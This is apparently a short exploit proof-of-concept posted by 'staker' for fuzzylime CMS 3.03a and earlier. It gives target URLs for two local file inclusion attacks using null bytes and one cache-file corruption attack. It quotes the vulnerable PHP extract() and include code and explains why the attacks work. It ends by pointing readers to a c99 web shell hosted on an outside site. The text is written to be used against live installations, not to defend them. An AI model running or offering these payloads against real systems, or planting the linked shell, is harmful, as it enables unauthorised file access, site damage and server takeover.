±-----------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
±----------±-----------------------------------------------------------+
| by staker |
±----------±--------------------+
Author : xhaxkerx
Special Thankz : yasin
site : http://www.c99.mobi
±--------------------------------+
[1][LFI]
http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }
<?
@extract($HTTP_GET_VARS); <-------- {1}
@extract($_GET); <----------^
elseif(isset($e)) { <------- {2}
$filename = "code/mailing/$list.inc.php"; <------- {3}
@include $filename; <------- {4}
extract() allows to overwrite any not-defined variable via get
therefore it works regardless of register_globals settings.
$e is a variable not defined,therefore become $_GET['e']
$list is a variable not defined,therefore become $_GET['list']
$filename contains $list variable that will be required
[2][LFI]
http://[target]/[path]/code/display.php?template= {file + nullbyte}
[3][LFC]
http://[target]/[path]/code/display.php?usecache=1&s=…//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)
if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
$output = ob_get_contents();
fputs($handle, $output);
fclose($handle);
}
if you need shell http://www.c99.mobi/c99.txt